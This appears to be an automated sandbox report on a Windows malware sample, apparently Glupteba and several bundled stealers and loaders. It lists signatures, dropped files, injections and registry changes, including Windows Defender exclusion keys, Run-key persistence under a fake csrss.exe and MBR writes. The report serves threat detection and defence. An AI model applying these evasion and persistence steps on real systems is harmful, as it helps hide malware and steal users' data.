Malware Analysis Report

2024-11-30 04:46

Sample ID 240222-g2y62sdc6x
Target d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe
SHA256 d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c
Tags
dcrat glupteba smokeloader socks5systemz stealc pub1 backdoor bootkit botnet discovery dropper evasion infostealer loader persistence rat spyware stealer trojan upx lumma
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c

Threat Level: Known bad

The file d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe was found to be: Known bad.

Malicious Activity Summary

Glupteba

SmokeLoader

Glupteba payload

Socks5Systemz

Windows security bypass

Stealc

Lumma Stealer

Detect Socks5Systemz Payload

DcRat

Detects executables referencing many varying, potentially fake Windows User-Agents

Detects executables Discord URL observed in first stage droppers

Detect binaries embedding considerable number of MFA browser extension IDs.

Detects Windows executables referencing non-Windows User-Agents

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables containing URLs to raw contents of a Github gist

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

UPX dump on OEP (original entry point)

Detects executables packed with VMProtect.

Detects executables containing artifacts associated with disabling Windows Defender

Modifies Windows Firewall

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

UPX packed file

Windows security modification

Deletes itself

Executes dropped EXE

Reads data files stored by FTP clients

Checks computer location settings

Reads user/profile data of web browsers

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-22 06:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-22 06:18

Reported

2024-02-22 06:21

Platform

win7-20240221-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Socks5Systemz Payload

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socks5Systemz

botnet socks5systemz

Stealc

stealer stealc

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Windows executables referencing non-Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables Discord URL observed in first stage droppers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables containing artifacts associated with disabling Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with VMProtect.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many varying, potentially fake Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cbujigs N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A220.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B276.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B276.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\BFC7.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2640 set thread context of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2068 set thread context of 1368 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\system32\conhost.exe
PID 2068 set thread context of 2800 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240222062035.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\D339.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cbujigs N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cbujigs N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cbujigs N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
